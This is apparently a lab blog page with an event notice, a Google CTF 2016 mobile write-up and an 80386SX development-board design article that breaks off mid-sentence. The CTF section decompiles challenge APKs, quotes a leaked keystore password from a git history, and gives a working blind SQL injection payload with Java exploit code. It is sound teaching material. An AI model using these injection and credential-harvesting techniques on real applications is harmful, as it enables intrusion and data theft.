The schedule will be as follow:
- July, Thursday the 14th all day long
- July, Friday the 15th in the evening
- July, Saturday the 16th all day long
The complete schedule is available on the page dedicated to the event
LSE Week 2016 Announcement
For the sixth year, we are organising the LSE Summer Week mid-July to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
All details are on the main page of the event: LSE Summer Week 2016
Google Capture The Flag 2016: Mobile category
There was 3 challenges in the mobile category. Let’s see how we solved them.
Ill Intentions
Ill Intentions
150 points
Do you have have ill intentions?
file: illintentions.apk
For this first one, we have an apk and some allusions to the intent system used on android. Let’s start by testing it a little in an emulator!
$ /opt/android-sdk/tools/emulator -avd Nexus_5X_API_23 & $ adb devices List of devices attached * daemon not running. starting it now on port 5037 * * daemon started successfully * emulator-5554 device $ adb install illintentions.apk 3576 KB/s (51856 bytes in 0.014s) pkg: /data/local/tmp/illintentions.apk Success
Let’s extract the apk and decompile it in order to see what is inside. For this, I like to use 2 different tools, as they are not giving us the same output (and I am lazy, and don’t know how to do it with only one tool).
First,
dex2jar
takes an apk, and turns it to a jar. We can then read the code withjd-gui
.$ dex2jar illintentions.apk $ jd-gui illintentions.apk
The other tool is
apktool
that gives us all the manifests and metadata correctly reversed and lisible.$ apktool -d illintentions.apk $ find illintentions illintentions illintentions/AndroidManifest.xml illintentions/lib illintentions/lib/x86_64 illintentions/lib/x86_64/libhello-jni.so illintentions/lib/armeabi illintentions/lib/armeabi/libhello-jni.so illintentions/lib/mips64 illintentions/lib/mips64/libhello-jni.so illintentions/lib/armeabi-v7a illintentions/lib/armeabi-v7a/libhello-jni.so illintentions/lib/x86 illintentions/lib/x86/libhello-jni.so illintentions/lib/arm64-v8a illintentions/lib/arm64-v8a/libhello-jni.so illintentions/lib/mips illintentions/lib/mips/libhello-jni.so illintentions/apktool.yml illintentions/original illintentions/original/AndroidManifest.xml illintentions/original/META-INF illintentions/original/META-INF/CERT.RSA illintentions/original/META-INF/MANIFEST.MF illintentions/original/META-INF/CERT.SF illintentions/smali illintentions/smali/com illintentions/smali/com/example illintentions/smali/com/example/application illintentions/smali/com/example/application/DefinitelyNotThisOne$1.smali illintentions/smali/com/example/application/MainActivity.smali illintentions/smali/com/example/application/Send_to_Activity.smali illintentions/smali/com/example/application/IsThisTheRealOne.smali illintentions/smali/com/example/application/DefinitelyNotThisOne.smali illintentions/smali/com/example/application/ThisIsTheRealOne.smali illintentions/smali/com/example/application/Utilities.smali illintentions/smali/com/example/application/IsThisTheRealOne$1.smali illintentions/smali/com/example/application/ThisIsTheRealOne$1.smali illintentions/smali/com/example/hellojni illintentions/smali/com/example/hellojni/Manifest.smali illintentions/smali/com/example/hellojni/R$attr.smali illintentions/smali/com/example/hellojni/R$string.smali illintentions/smali/com/example/hellojni/Manifest$permission.smali illintentions/smali/com/example/hellojni/R.smali illintentions/smali/com/example/hellojni/BuildConfig.smali illintentions/smali/com/example/hellojni/R$mipmap.smali illintentions/res illintentions/res/values illintentions/res/values/strings.xml illintentions/res/values/public.xml illintentions/res/mipmap-hdpi-v4 illintentions/res/mipmap-hdpi-v4/ic_launcher.png illintentions/res/mipmap-mdpi-v4 illintentions/res/mipmap-mdpi-v4/ic_launcher.png illintentions/res/mipmap-xhdpi-v4 illintentions/res/mipmap-xhdpi-v4/ic_launcher.png illintentions/res/mipmap-xxhdpi-v4 illintentions/res/mipmap-xxhdpi-v4/ic_launcher.png
What can we see here? There is some native libraries for multiple architecture, some resources, and the code for a simple application.
Let’s try to see what we can find in the java code:
We have 6 classes in this apk:
MainActivity
: probably the entry pointSend_to_Activity
IsThisTheRealOne
DefinitelyNotThisOne
ThisIsTheRealOne
Utilities
Here is the main activity:
package com.example.application; import android.app.Activity; import android.content.IntentFilter; import android.os.Bundle; import android.widget.TextView; public class MainActivity extends Activity { public void onCreate(Bundle paramBundle) { super.onCreate(paramBundle); paramBundle = new TextView(getApplicationContext()); paramBundle.setText("Select the activity you wish to interact with.To-Do: Add buttons to select activity, for now use Send_to_Activity"); setContentView(paramBundle); paramBundle = new IntentFilter(); paramBundle.addAction("com.ctf.INCOMING_INTENT"); registerReceiver(new Send_to_Activity(), paramBundle, "ctf.permission._MSG", null); } }
The application registers a handler to a broadcast intent named
"com.ctf.INCOMING_INTENT"
and usesSend_To_Activity
as a BroadcastReceiver.public void onReceive(Context paramContext, Intent paramIntent) { paramIntent = paramIntent.getStringExtra("msg"); if (paramIntent.equalsIgnoreCase("ThisIsTheRealOne")) { paramContext.startActivity(new Intent(paramContext, ThisIsTheRealOne.class)); return; } if (paramIntent.equalsIgnoreCase("IsThisTheRealOne")) { paramContext.startActivity(new Intent(paramContext, IsThisTheRealOne.class)); return; } if (paramIntent.equalsIgnoreCase("DefinitelyNotThisOne")) { paramContext.startActivity(new Intent(paramContext, DefinitelyNotThisOne.class)); return; } Toast.makeText(paramContext, "Which Activity do you wish to interact with?", 1).show(); }
What we can see in it is that it takes a string parameter
"msg"
that is calling one of the activies in the apk, depending on this value. Let’s try to trigger one of them, and look at what it does.We have 3 choices:
- ThisIsTheRealOne
- IsThisTheRealOne
- DefinitelyNotThisOne
let’s assume we can ignore
DefinitelyNotThisOne
and tryThisIsTheRealOne
.$ adb shell am broadcast -a com.ctf.INCOMING_INTENT --es msg ThisIsTheRealOne Broadcasting: Intent { act=com.ctf.INCOMING_INTENT (has extras) } Broadcast completed: result=0
The code handling that is the following:
public class ThisIsTheRealOne extends Activity { static { System.loadLibrary("hello-jni"); } public void onCreate(Bundle paramBundle) { super.onCreate(paramBundle); new TextView(this).setText("Activity - This Is The Real One"); paramBundle = new Button(this); paramBundle.setText("Broadcast Intent"); setContentView(paramBundle); paramBundle.setOnClickListener(new View.OnClickListener() { public void onClick(View paramAnonymousView) { paramAnonymousView = new Intent(); paramAnonymousView.setAction("com.ctf.OUTGOING_INTENT"); String str1 = ThisIsTheRealOne.this.getResources().getString(0x7f030006) + "YSmks"; String str2 = Utilities.doBoth(ThisIsTheRealOne.this.getResources().getString(0x7f030002)); String str3 = Utilities.doBoth(getClass().getName()); paramAnonymousView.putExtra("msg", ThisIsTheRealOne.this.orThat(str1, str2, str3)); ThisIsTheRealOne.this.sendBroadcast(paramAnonymousView, "ctf.permission._MSG"); } }); } } public class IsThisTheRealOne extends Activity { static { System.loadLibrary("hello-jni"); } public void onCreate(Bundle paramBundle) { getApplicationContext(); super.onCreate(paramBundle); new TextView(this).setText("Activity - Is_this_the_real_one"); paramBundle = new Button(this); paramBundle.setText("Broadcast Intent"); setContentView(paramBundle); paramBundle.setOnClickListener(new View.OnClickListener() { public void onClick(View paramAnonymousView) { paramAnonymousView = new Intent(); paramAnonymousView.setAction("com.ctf.OUTGOING_INTENT"); String str1 = IsThisTheRealOne.this.getResources().getString(0x7f030007) + "\\VlphgQbwvj~HuDgaeTzuSt.@Lex^~"; String str2 = Utilities.doBoth(IsThisTheRealOne.this.getResources().getString(0x7f030001)); String str3 = getClass().getName(); str3 = Utilities.doBoth(str3.substring(0, str3.length() - 2)); paramAnonymousView.putExtra("msg", IsThisTheRealOne.this.perhapsThis(str1, str2, str3)); IsThisTheRealOne.this.sendBroadcast(paramAnonymousView, "ctf.permission._MSG"); } }); } }
Ok, so we have a button that sends an intent with 3 parameters when clicked. Some of the parameters comes from the resources stored in the apk, for that, we have 2 xml files from the apktool extraction:
$ cat illintentions/res/values/public.xml <?xml version="1.0" encoding="utf-8"?> <resources> <public type="mipmap" name="ic_launcher" id="0x7f020000" /> <public type="string" name="android.permission._msg" id="0x7f030000" /> <public type="string" name="app_name" id="0x7f030001" /> <public type="string" name="dev_name" id="0x7f030002" /> <public type="string" name="flag" id="0x7f030003" /> <public type="string" name="git_user" id="0x7f030004" /> <public type="string" name="str1" id="0x7f030005" /> <public type="string" name="str2" id="0x7f030006" /> <public type="string" name="str3" id="0x7f030007" /> <public type="string" name="str4" id="0x7f030008" /> <public type="string" name="test" id="0x7f030009" /> </resources> $ cat illintentions/res/values/strings.xml <?xml version="1.0" encoding="utf-8"?> <resources> <string name="android.permission._msg">Msg permission for this app</string> <string name="app_name">SendAnIntentApplication</string> <string name="dev_name">Leetdev</string> <string name="flag">Qvq lbh guvax vg jbhyq or gung rnfl?</string> <string name="git_user">l33tdev42</string> <string name="str1">`wTtqnVfxfLtxKB}YWFqqnXaOIck`</string> <string name="str2">IIjsWa}iy</string> <string name="str3">TRytfrgooq|F{i-JovFBungFk</string> <string name="str4">H0l3kwjo1|+kdl^polr</string> <string name="test">Test String for debugging</string> </resources> guinness:intents$
Interlude: Can you repo it?
Can you repo it?
5 points
Do you think the developer of Ill Intentions knows how to set up public repositories?
Really nothing much to say here, we grabbed the git username of the developper of Ill Intentions in
res/values/strings.xml
, “l33tdev42”, looked him up on github, cloned the only repository available, and took a look at the git history, and the last commit is this one:From 5b315cbbfaa2da9502ffae73f283d36d89f92194 Mon Sep 17 00:00:00 2001 From: Niru Ragupathy <niruragu@google.com> Date: Thu, 28 Apr 2016 13:48:07 -0700 Subject: [PATCH] Oops. removing the passcodes --- app/build.gradle | 35 ----------------------------------- 1 file changed, 35 deletions(-) delete mode 100644 app/build.gradle diff --git a/app/build.gradle b/app/build.gradle deleted file mode 100644 index a531d73..0000000 --- a/app/build.gradle +++ /dev/null @@ -1,35 +0,0 @@ -apply plugin: 'com.android.application' - -android { - compileSdkVersion 23 - buildToolsVersion "23.0.2" - - defaultConfig { - applicationId "test.leetdev.helloworld" - minSdkVersion 15 - targetSdkVersion 23 - versionCode 1 - versionName "1.0" - } - buildTypes { - release { - minifyEnabled false - proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro' - } - } - signingConfigs { - create("release") { - storeFile = file("leetdev_android.keystore") - storePassword = "!lPpR4UC6JYaUj" - keyAlias = "appsKeys" - keyPassword = "ctf{TheHairCutTookALoadOffMyMind}" - } - } -} - -dependencies { - compile fileTree(dir: 'libs', include: ['*.jar']) - testCompile 'junit:junit:4.12' - compile 'com.android.support:appcompat-v7:23.2.0' - compile 'com.android.support:design:23.2.0' -}
Do we really need to say more? That was fun, and this is something I really liked in all this ctf, most of (if not all) the challenges was nearly real case scenarios! This is really interesting to have something like that in a ctf, congrats google!
Back to the challenge
Back to our intents!
orThat()
is a native method contained inside the libraryhello-jni.so
. Let’s take a look at it.Here is the pseudo code for the
x86_64
version:int Java_com_example_application_ThisIsTheRealOne_orThat(void *javavm, void *pstr1, void *pstr2, void *pstr3) { str1 = (*(int (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)javavm + 1352LL))(javavm, pstr1, 0LL); str2 = (*(int (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)javavm + 1352LL))(javavm, pstr2, 0LL); str3 = (*(int (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)javavm + 1352LL))(javavm, pstr3, 0LL); v48 = &str1[strlen(str1)]; *(_QWORD *)v48 = 6593072240547940682LL; *(_QWORD *)(v48 + 8) = 7953489387895941752LL; *(_QWORD *)(v48 + 16) = 4706092811935960959LL; *(_QWORD *)(v48 + 24) = 7092423305623858002LL; *(_QWORD *)(v48 + 32) = 7382373343648048710LL; *(_QWORD *)(v48 + 40) = 8315423270923304302LL; *(_QWORD *)(v48 + 48) = 6008194790891616369LL; *(_DWORD *)(v48 + 56) = 1684893287; *(_WORD *)(v48 + 60) = 8547; *(_BYTE *)(v48 + 62) = 0; strncpy(str1_1, str1, 76); strncpy(str2_1, str2, 76); strncpy(str3_1, str3, 76); idx = 0; do { flag[idx++] = str1_1[idx] ^ str2_1[idx] ^ str3_1[idx]; } while ( idx != 76 ); printf("Here is your Reply: %s", &flag); return (*(int (__fastcall **)(__int64, int *))(*(_QWORD *)javavm + 1336LL))(javavm, &flag); }
The other one (
IsThisTheRealOne
) is more or less the same thing. As this can’t work on the real device (v48
is writing outside the allocated memory) Let’s write the code for that:import binascii import base64 import hashlib def doBoth(input): customEncodeValue = hashlib.sha224(input).hexdigest().encode('ascii') return base64.encodebytes(customEncodeValue)[:-1] def translate(input): tbl = { b'=': b'?', b'1': b'W', b'2': b'h', b'3': b'a', b'4': b't', b'5': b'i', b'6': b's', b'7': b'd', b'8': b'o', b'9': b'n', b'0': b'e' } for k,v in tbl.items(): input = input.replace(k, v) return input def xor3(str1, str2, str3): return ''.join([ chr(str1[x] ^ str2[x] ^ str3[x]) for x in range(len(str1)) ]) def chunks(l, n): n = max(1, n) return [l[i:i + n] for i in range(0, len(l), n)] def native_array_translation(input): return binascii.unhexlify(''.join([ ''.join(chunks(s, 2)[::-1]) for s in input])) def tryThisIsTheRealOne(): str1 = b"IIjsWa}iyYSmks" str2 = translate(doBoth(b"Leetdev")) str3 = translate(doBoth(b"com.example.application.ThisIsTheRealOne$1")) array_in_native_code = [ "5B7F4C456C59494A", "6E6078757A606A78", "414F667A7F764F7F", "626D596B50696B52", "667375714B746646", "736651686C667D6E", "536165545C727871", "646D6E67", "2163" ] str1 = str1 + native_array_translation(array_in_native_code) return xor3(str1, str2, str3) def tryIsThisTheRealOne(): str1 = b"TRytfrgooq|F{i-JovFBungFk" + b"\\VlphgQbwvj~HuDgaeTzuSt.@Lex^~" str2 = translate(doBoth(b"SendAnIntentApplication")) str3 = translate(doBoth(b"com.example.application.IsThisTheRealOne$1"[:-2])) array_in_native_code = [ "7B62617247776E77", "43727F686274754F", "6D716674", "7D" ] str1 = str1 + native_array_translation(array_in_native_code) return xor3(str1, str2, str3) print(tryThisIsTheRealOne()) print(tryIsThisTheRealOne())
The first one was a joke, thanks guys, and the last one was the real flag.
Note for later:
getClass().getName()
returns the full name of the class, with the package name, and if it is a nested class, you will have some kind of"$N"
after.The Little Bobby
Little Bobby Application
250 points
Find the vulnerability, develop an exploit, and when you’re ready, submit your APK to https://bottle-brush-tree.ctfcompetition.com. Can take up to 15 minutes to return the result.
file: BobbyApplication_CTF.apk
We have to build an apk that will be sent to a server, launched inside an android vm and we get logcat output as a result.
This is a simple application with an Intent login service.
protected void onCreate(Bundle paramBundle) { Log.d("Startup", "Bobby's Application is now running"); super.onCreate(paramBundle); paramBundle = new IntentFilter(); new LocalDatabaseHelper(getApplicationContext()); paramBundle.addAction("com.bobbytables.ctf.myapplication_INTENT"); registerReceiver(new LoginReceiver(), paramBundle); /* ... */ }
Here is the
LoginReceiver
class:public class LoginReceiver extends BroadcastReceiver { public void onReceive(Context paramContext, Intent paramIntent) { Object localObject = paramIntent.getStringExtra("username"); paramIntent = paramIntent.getStringExtra("password"); Log.d("Received", (String)localObject + ":" + paramIntent); paramIntent = new LocalDatabaseHelper(paramContext).checkLogin((String)localObject, paramIntent); localObject = new Intent(); ((Intent)localObject).setAction("com.bobbytables.ctf.myapplication_OUTPUTINTENT"); ((Intent)localObject).putExtra("msg", paramIntent); paramContext.sendBroadcast((Intent)localObject); } } public String checkLogin(String paramString1, String paramString2) { SQLiteDatabase localSQLiteDatabase = getReadableDatabase(); Cursor localCursor = localSQLiteDatabase.rawQuery("select password,salt from users where username = \"" + paramString1 + "\"", null); Log.d("Username", paramString1); if ((localCursor != null) && (localCursor.getCount() > 0)) { localCursor.moveToFirst(); paramString1 = localCursor.getString(0); String str = localCursor.getString(1); localCursor.close(); localSQLiteDatabase.close(); if (Utils.calcHash(paramString2 + str).equals(paramString1)) { Log.d("Result", "Logged in"); return "Logged in"; } Log.d("Result", "Incorrect password"); return "Incorrect password"; } if (localCursor != null) localCursor.close(); localSQLiteDatabase.close(); Log.d("Result", "User does not exist"); return "User does not exist"; } public void onCreate(SQLiteDatabase paramSQLiteDatabase) { paramSQLiteDatabase.execSQL("CREATE TABLE users (_id INTEGER PRIMARY KEY,username TEXT,password TEXT,flag TEXT,salt TEXT)"); } public long insert(String paramString1, String paramString2) { int i = new Random().nextInt(31337); paramString2 = Utils.calcHash(paramString2 + new Integer(i).toString()); SQLiteDatabase localSQLiteDatabase = getWritableDatabase(); ContentValues localContentValues = new ContentValues(); localContentValues.put("username", paramString1); localContentValues.put("password", paramString2); localContentValues.put("flag", "ctf{An injection is all you need to get this flag - " + paramString2 + "}"); localContentValues.put("salt", new Integer(i).toString()); long l = localSQLiteDatabase.insert("users", null, localContentValues); localSQLiteDatabase.close(); return l; }
As we can see, there is a simple sql injection in the
checkLogin
method. In the code we can see that if the query is returning no result, we have"User does not exist"
as a parameter in an intent"com.bobbytables.ctf.myapplication_OUTPUTINTENT"
, and"Incorrect password"
if the query returns a result.Ok, so let’s try to exploit this in blind!
First we need to have a request that can return a result or not. As we can see, the salt will always be under 31337, we can use that to always have some kind of result. Let’s inject as a username:
"\" or cast(salt as decimal) > 31337 or (" + expression + ") and \"1\"=\"1"
with that, we can put anything we want in
expression
(yeah, as I am reading it now, it is too complicated, we can do much simpler).Ok, so we first have to guess the size of the flag, and then find all the characters. Here is the java code that is doing that.
public class LoginResult extends BroadcastReceiver { String EXPR_TRUE = "Incorrect password"; int state; // 0 -> startup, 1 -> guess length, 2 -> guess flag int max; int min; int pivot; int flag_length; int idx = 0; ArrayList<Integer> flag; public LoginResult() { this.max = 1000; this.min = 0; this.state = 0; } static String getFlag(ArrayList<Integer> l) { String res = ""; for (Integer i : l) { res += (char)(i.intValue() + 1); } return res; } @Override public void onReceive(Context context, Intent intent) { if (state == 0) { state = 1; pivot = min + (max - min) / 2; IntentHelper.tryLen(context, pivot); } else if (state == 1) { String msg = intent.getStringExtra("msg"); Log.e("gaby.sqli/LOG", String.format(Locale.getDefault(), "pivot: %d", pivot)); if (min == pivot || max == pivot) { flag_length = pivot; state = 2; IntentHelper.tryLen(context, flag_length); } else if (msg.equals(EXPR_TRUE)) { // length(flag) > pivot min = pivot; pivot = min + (max - min) / 2; IntentHelper.tryLen(context, pivot); } else { max = pivot; pivot = min + (max - min) / 2; IntentHelper.tryLen(context, pivot); } } else if (state == 2) { if (idx == 0) { // find the flag now! Log.d("gaby.sqli/FLAG_LENGTH", String.format("%d", flag_length)); idx = 1; // first step flag = new ArrayList<Integer>(); min = 31; max = 127; pivot = min + (max - min) / 2; IntentHelper.tryChar(context, idx, pivot); } else { String msg = intent.getStringExtra("msg"); Log.e("gaby.sqli/LOG", String.format(Locale.getDefault(), "pivot: %d", pivot)); if (min == pivot || max == pivot) { // XXX if (idx > flag_length + 1) { // WIN! state = 3; Log.e("gaby.sql/FLAG", String.format("The flag is: %s", getFlag(flag))); DialogHelper.showMessage(context, "WIN", String.format("The flag is: %s", getFlag(flag))); } else { Log.e("gabv.sql/LOG", String.format(Locale.getDefault(), "flag[%d] = %d", idx, pivot)); flag.add(pivot); idx += 1; min = 31; max = 127; pivot = min + (max - min) / 2; } IntentHelper.tryChar(context, idx, pivot); } else if (msg.equals(EXPR_TRUE)) { // length(flag) > pivot min = pivot; pivot = min + (max - min) / 2; IntentHelper.tryChar(context, idx, pivot); } else { max = pivot; pivot = min + (max - min) / 2; IntentHelper.tryChar(context, idx, pivot); } } } } } public class IntentHelper { public static void tryLogin(Context context, String username, String password) { Intent intent = new Intent(); intent.setAction("com.bobbytables.ctf.myapplication_INTENT"); intent.putExtra("username", username); intent.putExtra("password", password); context.sendBroadcast(intent); } public static void tryInject(Context context, String expression) { tryLogin(context, "\" or cast(salt as decimal) > 31337 or (" + expression + ") and \"1\"=\"1", "password"); } public static void tryLen(Context context, int len) { tryInject(context, String.format(Locale.getDefault(), "length(flag) > %d", len)); } public static void tryChar(Context context, int index, int c) { tryInject(context, String.format(Locale.getDefault(), "substr(flag, %d, 1) > char(%d)", index, c)); } }
And with that, we can have the complete flag. Yeah, the code is ugly, it was a little difficult to have something clear in the intent callback.
full code for this apk is available on our repositories.
Designing an Intel 80386SX development board
The LSE-PC aims to be a compact IBM-PC compatible development board based on an Intel
80386SX
CPU and an Altera Cyclone IVEP4CE22E22
FPGA in order to emulate a custom chipset.The main goal of this project is to create a simple, debuggable and customisable version of the well-known PC hardware architecture. Its purpose is mainly didactic for students or experienced developers who want to get started into x86 low-level programming.
Hardware Overview
The schematics were designed using gschem which is a part of the gEDA project. Although the provided component library is acceptable, most of the chips used on this board are outlandish and so need to be drawn before starting overall schematics. This rude work was achieved by using djboxsym tool which allows quick production of gschem symbols from a minimal description.
Central Processing Unit
The CPU used on this board is a
80386SX
designed by Intel and released in- It is basically a cut-down version of the original
386
with a 16-bit physical data bus. Although memory access performance is hardly affected, it is still fully 32-bit internally and was designed to be used in a 16-bit environment which is simpler and cheaper to design that a full 32-bit compatible motherboard. The physical address bus is only 24-bit which limits address space to 16MB.
The model used here is an
NG80386SXLP20
which is a low power version clocked at 20MHz and packaged in a 100-pin Plastic Quad Flat pack. Of course, this chip is today considered obsolete but is still the only 32-bit x86 CPU which is simple enough to be integrated in an amateur board.Field-Programmable Gate Array
The main criterion for choosing an appropriate FPGA was about packaging. Knowing that this chip will be hand-soldered, selecting a Ball Grid Array based component was inconceivable. I’m also quite used to work with Altera’s FPGA so one from the Cyclone IV series was a good compromise. The model chosen is an
EP4CE22E22C7N
released in 2009. With its 22320 logic elements, it is one of the largest FPGA available on EQFP. This package, only used by Altera, is an enhanced version of the standard plastic quad flat package which uses a step of 0.5 millimeter between each pins. This layout allows the FPGA to expose 144 pins where 62 can be used as I/O and 15 as clock inputs.An other useful feature is the 3.3V PCI compliant mode of the IO banks. It provides compatibility with 5V devices by enabling a clamping diode which can supports 25mA. This explains the use of 120 Ohms resistors between CPU 5V signals and FPGA IO.
The CPU needs a 20MHz input clock to operate correctly. A unique oscillator is used to clock CPU and FPGA. The idea here is to assume that if the FPGA needs a higher clock speed, the use of an internal Phase Locked Loop will be considered to obtain the desired frequency from this 20MHz clock.
FPGA programming and debugging can be performed through JTAG. Altera provides a dedicated programmer called the USB Blaster which can be easily used with Quartus II. It provides a standard 10-pin connector and operates here at 2.5V.
As FPGA configuration is volatile, it is necessary to provide an external way to program it when the board is powered on. Here this is achieved by an external serial flash which contains the whole FPGA configuration. Altera sells
EPCQ
devices which are dedicated to that purpose. However, most of the time those are expensive and it turns out that they are nothing more than SPI flash memories. That is why it has been decided to use anM25P16
, a 16Mbits flash memory from Micron which perfectly do the job.In fact, several programming modes are available in this FPGA. In order to indicate what mode has to be used,
MSEL
pins must be pulled-up or pulled-down to encode the mode number. To select the Active Serial Programming mode, it is necessary to solder 120 Ohms resistors onR77
,R79
andR81
.USB/UART bridge
In addition to JTAG, it can be a good idea to provide USB connectivity to this design. However, implementing USB protocol stack in an FPGA can be really painful. The purpose of the
FT230X
chip is to provide a simple bridge between an USB and an UART interface which is simpler to implement in an FPGA. It is provided in a SSOP16 package and is really simple to wire thanks notably to the fully integrated clock generation which does no require an external crystal.Static Random Access Memory
For the main RAM,
AS6C8016
from Alliance Memory has been chosen. This is a 512K x 16-bit CMOS static RAM packaged in a 44-pin TSOP. It features tri-state output and data byte control (LB
andUB
signals) as required by the80386SX
.Although this chip was originally designed to be used as a battery backed-up non-volatile memory, its usage simplicity and its response time justify the low storage space. So 1MB ought to be enough for anybody. Also,
AS6C8016
is powered by 5V but is still fully TTL compatible which means that it can be driven by the CPU as well as the 3.3V outputted by FPGA’s IO. So control signals asRAMCS
andRAMWE
are only driven by the FPGA which will perform address decoding.Voltage Regulation
The power circuitry has to provide four sources of different voltages:
- 5V: CPU, SRAM
- 3.3V: FPGA In/Out
- 2.5V: FPGA Analog PLL
- 1.2V: FPGA internal logic, Digital PLL
Regulation is achieved by three fixed low drop positive voltage regulators which operate from the 5V supplied by the USB. Even though fixed regulators are often more expensive that adjustable regulators, they are easier to wire and reduce the number of passive components needed to perform adjustment. Only 250mA are provided for 2.5V because it is only used by FPGA Analog PLL and JTAG target voltage.
Routing and Manufacturing the Printed Circuit Board
Once the schematics completed, PCB has to be designed. This process has been assisted by pcb, an other part of gEDA project. As schematics and PCB designs are not performed using the same software (as KiCad or Eagle do), synchronization between those is ensured thanks to the gsch2pcb tool.
As some components on the board do not use standard packages, creating custom pcb footprint for those chip is necessary. Like symbols generation, footprints was generated using footgen.
The PCB routing here is a bit tricky due to the large number of signals needed to drive the CPU. A 4-layer PCB is unavoidable in order to achieve routing and to preserve signal integrity. As our manufacturer limits 4-layer board 5 x 10cm, this is the dimension adopted which is large enough for this design.
Each layer has a dedicated purpose:
- Top layer : it is mainly used for signals routing. Traces used for data signal are 0.20mm width which is the limit imposed by manufacturer. Unused spaces are recycled to ground planes. FPGA, CPU and voltage regulators are soldered on this layer.
- Ground layer : Used almost exclusively to get a common ground plane in the whole circuit. It has also been used to complete RAM routing.
- Power layer : Dedicated to conduct power rails through the board. Four areas corresponding to each voltage level can be clearly seen on this layer.
- Bottom layer : Like the top layer, this is mainly used for signals routing. Capacitors used to apply local filtering are soldered on this side as well as SRAM and 20MHz oscillator.
With a low end SMD soldering station, it takes approximately three hours to solder a whole board.
In addition to PCB, acrylic case was designed using FreeCAD and then manufactured.
Emulating a rudimentary chipset
Now that the board is correctly soldered, the last thing to do before being able to run code on the CPU is to configure the FPGA in order to emulate a basic chipset. The design is composed of two parts : the bus controller and the memory controller.
Bus Controller
The bus controller has to handle
80386SX
bus access protocol. In order to understand the exact purpose of it, it is necessary to detail signals involved in the process.- The Data Bus (
D[15:0]
) is composed of three-state bidirectional signals providing a general purpose data path between386
and other devices (such as memory). - The Address Bus (
A[23:1]
,BHE#
,BLE#
) is composed of three-state outputs providing physical memory addresses or I/O port addresses. The Byte Enable outputs (BHE#
andBLE#
) indicate which bytes of the 16-bit data bus are involved with the current transfer. If both of them are asserted, then 16 bits word is being transferred, - A Bus Cycle is defined by
W/R#
,D/C#
,M/IO#
andLOCK#
three-state outputs.W/R#
distinguishes between write and read cycles,D/C#
distinguishes between data and control cycles,M/IO#
distinguishes between memory and I/O cycles and#LOCK
indicates if the current operation is atomic or not. - The Bus Access is controlled by
ADS#
,READY#
andNA#
. The Address Status (ADS#
) indicates that a valid bus cycle definition and address are being driven from the386
pins. Most of the bus controller logic must be based on the falling-edge of this signal.READY#
signal indicates a transfer acknowledge driven by the bus controller to the386
.NA#
signal is used to request address pipelining which is not relevant in this case.
As an example, here is a waveform of bus signals during these operations :
- Write data1 to address1
- Read data2 from address2
- Write data3 to address3
- Idle
- Read data4 from address4
Each bus access operates in two steps. The first one, indicated by
ADS#
is used to drive Bus Cycle Definition signals and an address. The second one take place during the next rising edge of the main clock. Depending on theW/R#
pin state, the data bus is driven with the value the CPU wants to write. During all these sequencesADS#
is still asserted.The next bus cycle is performed when the
386
detects a falling edge on theREADY#
signal. So the bus controller can be easily modeled as the following Finite-State Machine :It is simple to implement this behavior in Verilog :
always @(posedge clk) begin if (!_ads) begin capture_bus(); // Capture values driven on // A[23:1], D[15:0], /BLE, /BHE, WR, DC and MIO _ready <= 1; state <= `ST_T1; end else if (state == `ST_T1) begin _ready <= 0; state <= `ST_T2; end end
As data bus is bidirectional, it is sometimes necessary to set it in high impedance in order to let another device driving the bus. It is also needed to respect bytes requested by the CPU via
BHE#
andBLE#
.assign d[15:8] = wr || _bhe || !ramcs ? 8'hzz : dout[15:8]; assign d[7:0] = wr || _ble || !ramcs ? 8'hzz : dout[7:0];
Memory Controller
Once the bus protocol is properly respected, the address requested by the CPU must be decoded in order to figure out which device must be selected. This is here the purpose of the memory controller unit.
Altera Cyclone IV devices features embedded memory structures. It consists of M9K memory blocks that can be configured to provide various memory functions, such as RAM, shift registers or ROM. The idea here is to use it to create a small memory which is initialized with a basic piece of code dedicated to CPU initialization. An other useful feature of this memory is to be easily readable and editable through JTAG using the In-System Content Editor provided by Quartus II.
Basically, the main address space is composed of two memories : an external (i.e. the SRAM) and an internal (i.e. the M9K blocks).
The first megabyte of addressable memory is organized as the layout of the traditional IBM-PC. It means that only the first 640K of external memory are mapped from
0x000000
to0x0A0000
and BIOS shadow ROM (implemented here with internal memory) is mapped from0x0F8000
to0x100000
. Shadow ROM was originally a 64KB memory which contains a copy of the BIOS ROM mapped on the last 64KB of the address space. As the CPU starts fetching instructions at0xFFFFF0
after a reset, the mechanism consists of mapping a ROM at this address, copying ROM content on the shadow ROM and then jumping on a subroutine located on the first megabyte.Here, the internal RAM is only 32KB due to the FPGA limitations and is located at
0xFF8000
and0x0F8000
which allows simulation of the original machinery. Moreover, the whole SRAM is mapped from 1MB which means that first 640KB of external RAM are mapped twice.Memory controller unit can be simplified as :
The actual address space layout is achieved by applying a logic expression to the chip select signal of each memory. Notice that
WE#
signal of SRAM is not active on the same level thatW/R#
386
signal. So this signal is inverted by the FPGA.assign eramwe = !wr; assign eramcs = !(cs && ((addr[23:16] < 8'h0A) || (addr[23:20] == 4'h1))); assign iramcs = cs && ((addr[23:15] == 9'h1FF) || (addr[23:15] == 9'h01F));
Skeleton of a basic firmware
As an example, this section will present a basic firmware which can be run on the LSE-PC.
Firstly, it is considered here that the entire firmware will be located on the internal memory which is automatically initialized when the design is loaded into the FPGA.
On reset, the
80386
CPU is running in real mode and will start to execute the instructions located at the end of the address space:0xFFFFF0
. So the purpose of these instructions are to jump to the first megabyte by reloading Code Segment. However, the last 16 bytes can be used to set a minimal environment to allow 16-bit application execution. The following code is an example of 5 instructions that can be assembled to 16 bytes of opcodes. It basically sets Data, Stack and Code Segment Selector, sets the stack pointer and then jumps to the beginning of the internal ram mapped at0x8000
.org 0xFFF0 ;; CS:0xF000, IP:0xFFF0 reset: mov ax, 0xF000 mov ds, ax mov ss, ax mov sp, 0xFFF0 jmp 0xF000:0x8000
Now that the execution flow has exited the reset state, it is now possible to set the CPU to protected mode. This can be achieved by loading a simple Global Descriptor Table which defines memory segments that will be used in protected mode. Notice that the jump to
reload_segs
